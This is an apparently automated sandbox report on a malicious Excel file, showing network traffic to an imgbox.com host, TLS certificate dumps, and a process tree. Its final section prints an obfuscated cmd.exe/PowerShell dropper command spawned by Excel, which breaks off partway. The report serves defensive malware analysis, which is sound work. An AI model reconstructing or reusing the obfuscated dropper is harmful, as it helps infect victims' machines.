Dec 13, 2018 21:40:31.251176119 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251209974 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251234055 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251257896 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251259089 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251282930 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251307011 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251331091 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251354933 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251358032 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251380920 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251408100 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251432896 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251441002 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251456976 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251482010 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251503944 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251528025 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251554012 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251554966 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251579046 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251606941 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251631021 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251642942 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251656055 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251679897 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251703978 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251725912 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251730919 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251749992 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251775026 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251799107 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251823902 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251823902 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251848936 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251873970 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251898050 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251921892 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251921892 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.251946926 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251970053 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.251992941 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252002954 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252018929 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252043962 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252068043 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252077103 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252091885 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252151012 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252182007 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252191067 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252224922 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252250910 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252255917 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252275944 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252300024 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252324104 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252347946 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252368927 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252372980 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252403975 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252433062 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252454042 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252479076 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252479076 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252504110 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252527952 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252552032 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252574921 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252576113 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252600908 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252624989 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252649069 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252666950 CET	443	49211	64.210.135.68	192.168.1.81
Dec 13, 2018 21:40:31.252676010 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.252890110 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.256606102 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.261014938 CET	49211	443	192.168.1.81	64.210.135.68
Dec 13, 2018 21:40:31.428970098 CET	49211	443	192.168.1.81	64.210.135.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2018 21:40:30.277715921 CET	63629	53	192.168.1.81	8.8.8.8
Dec 13, 2018 21:40:30.332106113 CET	53	63629	8.8.8.8	192.168.1.81

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 13, 2018 21:40:30.277715921 CET	192.168.1.81	8.8.8.8	0xd22a	Standard query (0)	images2.imgbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 13, 2018 21:40:30.332106113 CET	8.8.8.8	192.168.1.81	0xd22a	No error (0)	images2.imgbox.com	images2.imgbox.com.sds.rncdn7.com		CNAME (Canonical name)	IN (0x0001)
Dec 13, 2018 21:40:30.332106113 CET	8.8.8.8	192.168.1.81	0xd22a	No error (0)	images2.imgbox.com.sds.rncdn7.com		64.210.135.68	A (IP address)	IN (0x0001)
Dec 13, 2018 21:40:30.332106113 CET	8.8.8.8	192.168.1.81	0xd22a	No error (0)	images2.imgbox.com.sds.rncdn7.com		64.210.135.70	A (IP address)	IN (0x0001)
Dec 13, 2018 21:40:30.332106113 CET	8.8.8.8	192.168.1.81	0xd22a	No error (0)	images2.imgbox.com.sds.rncdn7.com		64.210.135.72	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
Dec 13, 2018 21:40:30.512588978 CET	443	49211	64.210.135.68	192.168.1.81	CN=*.imgbox.com, OU=EssentialSSL Wildcard, OU=Domain Control Validated	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Oct 11 02:00:00 CEST 2018	Sat Oct 12 01:59:59 CEST 2019	[[ Version: V3 Subject: CN=.imgbox.com, OU=EssentialSSL Wildcard, OU=Domain Control Validated Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 25592044515688044941658146223526238837451653417397701691984824476844100040642305860704175212495742028877102429874172065041822890187808109355102735473752805735051088560120008575408549866142515763847007716571914104802396092284603485766213721100157833744115468699685785551928496409379046110951463396627621701869633072038776717635396714377898658768559274006737239267192720807483953045332107896599398109927363252265357406742972318996409151789552402057497422277998943982888541298425263511478377405746066714579603369866112068685561271454590660056802205880754345241252834356978662288475508170722788896064201307025513604220211 public exponent: 65537 Validity: [From: Thu Oct 11 02:00:00 CEST 2018, To: Sat Oct 12 01:59:59 CEST 2019] Issuer: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ cd11c53c 3746cb52 b56e581b 5422f7a9]Certificate Extensions: 10[1]: ObjectId: 1.3.6.1.4.1.11129.2.4.2 Criticality=falseExtension unknown: DER encoded OCTET string =0000: 04 81 F4 04 81 F1 00 EF 00 75 00 EE 4B BD B7 75 .........u..K..u0010: CE 60 BA E1 42 69 1F AB E1 9E 66 A3 0F 7E 5F B0 .`..Bi....f..._.0020: 72 D8 83 00 C4 7B 89 7A A8 FD CB 00 00 01 66 64 r......z......fd0030: B5 8E 18 00 00 04 03 00 46 30 44 02 20 6A B5 F2 ........F0D. j..0040: 1E 6E 45 85 EE CC 32 3C CC 83 DF C2 0F 58 70 2F .nE...2<.....Xp/0050: 68 CB 96 5A B7 AB B4 0F DF AC F2 61 03 02 20 5F h..Z.......a.. _0060: 6E 6C E2 40 C1 E0 30 B8 C6 99 B9 30 E3 9B C6 D7 nl.@..0....0....0070: 04 92 BC 87 75 0D 8A 8E 6B C0 AD 52 74 7B A4 00 ....u...k..Rt...0080: 76 00 74 7E DA 83 31 AD 33 10 91 21 9C CE 25 4F v.t...1.3..!..%O0090: 42 70 C2 BF FD 5E 42 20 08 C6 37 35 79 E6 10 7B Bp...^B ..75y...00A0: CC 56 00 00 01 66 64 B5 8E 84 00 00 04 03 00 47 .V...fd........G00B0: 30 45 02 21 00 F2 5F 33 D7 FF 45 54 51 DE 6B 37 0E.!.._3..ETQ.k700C0: 83 A9 27 87 D6 96 09 24 82 B2 F7 6A 6F 77 8F 5F ..'....$...jow._00D0: 39 E0 40 6C FE 02 20 3B 74 39 54 2B 7A BD 38 1C 9.@l.. ;t9T+z.8.00E0: 9B 05 AF DD E4 E2 6D C6 4C 05 92 05 15 D7 F3 ED ......m.L.......00F0: D0 73 36 4F CB 8C CA .s6O...[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]][4]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.7][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: .imgbox.com DNSName: imgbox.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E1 02 A8 5B F0 E9 97 48 57 78 2F 5C 26 29 2E 9A ...[...HWx/\&)..0010: E4 96 FC 02 ....]]] Algorithm: [SHA256withRSA] Signature:0000: 7D 3D 93 76 F8 B0 78 89 75 12 B6 87 93 AB 01 B1 .=.v..x.u.......0010: D6 81 D2 C8 77 23 F8 EE 67 43 5B FE B3 9F 7B D8 ....w#..gC[.....0020: 3E 00 1C 2E B6 93 DC E1 D7 85 C1 6D AD 55 3F 6A >..........m.U?j0030: 57 4A 1E A5 69 96 31 24 E9 EF 40 56 2C 5C 9D C1 WJ..i.1$..@V,\..0040: E9 48 E8 38 02 66 66 0C 7A 3B A3 30 35 0C 1D 84 .H.8.ff.z;.05...0050: C2 04 C6 1C 9E 50 5A E3 C4 F5 5A F7 35 61 4F D6 .....PZ...Z.5aO.0060: 7C BC EB FE A7 CB BB D6 4A D4 46 80 2B A4 C1 80 ........J.F.+...0070: AE 27 6E 4D D6 89 FB EB EB 33 58 2B 6B D9 38 1C .'nM.....3X+k.8.0080: C8 39 C3 51 01 EC 6C 50 7B B6 8C 71 83 E3 32 2B .9.Q..lP...q..2+0090: 28 8C BC C6 CB 9B C3 31 AF EA 5B 83 08 05 C3 EE (......1..[.....00A0: 41 D9 E8 B4 13 40 6C 62 A1 DD 15 3B 1E 13 D7 00 A....@lb...;....00B0: 25 0C 27 D6 D0 24 E2 1B C2 FE E0 E7 1E A5 F8 05 %.'..$..........00C0: 6A 10 ED BE F5 DC 65 95 4A 63 EB BB 13 52 E6 38 j.....e.Jc...R.800D0: 27 2B 86 2E 55 1C 86 F2 0C 5C D4 DA 47 C0 3C 2C '+..U....\..G.<,00E0: 3D C1 1F D8 7B 60 72 8C 54 CA 54 08 3B 64 C5 8D =....`r.T.T.;d..00F0: 61 21 B6 79 46 D6 10 79 4E 3A F2 83 70 5B 4E 72 a!.yF..yN:..p[Nr]
Dec 13, 2018 21:40:30.512588978 CET	443	49211	64.210.135.68	192.168.1.81	CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Feb 12 01:00:00 CET 2014	Mon Feb 12 00:59:59 CET 2029	[[ Version: V3 Subject: CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 18021508317891126045114383893640587389787314988023771299021472384098480478916503597778296613150634219765052113517870635171403307225477983047468706279013651027886500159485348697094115927961850381525182009137128777951162358715158533528593200093291791323275973789174789209802980910482500744419318360338528025872227868058578212418244189425301367382232973595110901594292490129763308095314503250053957090379265992785603931784956681691284995547158646635183735467516188519673313343149548166538558424521681954529559978463371620234598058977077392872218941503229331579208118464720991080636709101634982701306129953489796945248933 public exponent: 65537 Validity: [From: Wed Feb 12 01:00:00 CET 2014, To: Mon Feb 12 00:59:59 CET 2029] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 2b2e6eea d975366c 148a6edb a37c8c07]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 90 AF 6A 3A 94 5A 0B D8 90 EA 12 56 73 DF 43 B4 ..j:.Z.....Vs.C.0010: 3A 28 DA E7 :(..]]] Algorithm: [SHA384withRSA] Signature:0000: 4E 2B 76 4F 92 1C 62 36 89 BA 77 C1 27 05 F4 1C N+vO..b6..w.'...0010: D6 44 9D A9 9A 3E AA D5 66 66 01 3E EA 49 E6 A2 .D...>..ff.>.I..0020: 35 BC FA F6 DD 95 8E 99 35 98 0E 36 18 75 B1 DD 5.......5..6.u..0030: DD 50 72 7C AE DC 77 88 CE 0F F7 90 20 CA A3 67 .Pr...w..... ..g0040: 2E 1F 56 7F 7B E1 44 EA 42 95 C4 5D 0D 01 50 46 ..V...D.B..]..PF0050: 15 F2 81 89 59 6C 8A DD 8C F1 12 A1 8D 3A 42 8A ....Yl.......:B.0060: 98 F8 4B 34 7B 27 3B 08 B4 6F 24 3B 72 9D 63 74 ..K4.';..o$;r.ct0070: 58 3C 1A 6C 3F 4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A .Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Dec 13, 2018 21:40:30.512588978 CET	443	49211	64.210.135.68	192.168.1.81	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE	Tue May 30 12:48:38 CEST 2000	Sat May 30 12:48:38 CEST 2020	[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1824 Parent PID: 532

General

Start time:	21:40:27
Start date:	13/12/2018
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x2f7e0000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	"C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2808 Parent PID: 1824

General

Start time:	21:40:29
Start date:	13/12/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nta','ese',( \''&&set k2G=Fcgjp5&&set y41=RGJGLLoPE1&&set dAs=49}{7}{51}{5}{2&&set sBW=uCbCLFi5BuJ&&set xZ=bl5RXj&&set FD=1CerMt7ONo0c','q','oSU&&set i9PL=;.&&set sD=6hkJYL&&set 96f=S'' )^^^^^^^^^^^^^^^\|.(''{0}{1}{&&set fH=tiONP&&set JF=ao&&set RO=YlN&&set GrLY=zZ','&&set yMaD=o5&&set XeL=}{1&&set L4=Ui&&set Yu=xW4i57aY&&set AG=js5R6Eb08Ls3','bxS&&set gS=ZL89PzDtI&&set 2JBb=14}{&&set qpO=-w 1 -nopR -sta -ExEcU&&set S1=d1KdrFAH&&set 5c=RN3RKBBV9ZXsjbAx8rLF&&set VZA=Vy7l4Jxf&&set M93h=gb&&set po=oL &&set i8=-f 'InG','TOS','Tr').\''IN`VOkE\''(&&set 7wv=u&&set aLve='),'Pr','t'&&set rdfX=43&&set ld=6}&&set 97tN=e8&&set JNvz=7+F','xvUjxS&&set Pj=M&&set J6=W&&set MTk=4&&set XjK=7ooYCqFO5CUzUMaaw92FK','WF&&set fWO4=OdQrtlwhW0wsc7/TRio00qZdd5&&set RLj=bR&&set mC=y3ANhm&&set 5m=E5C3FlV6&&set ibgE=FAmCFN0Ol&&set quG=nG''((''{22}{44}{11}&&set 79=P&&set pIA=2Edc7LZcTpp&&set QEdm=D4Xj&&set vrWE= ${vErb`o`sE&&set WMP='&&set mOv=25}{21}{28}{37}{40&&set kEQz='&&set 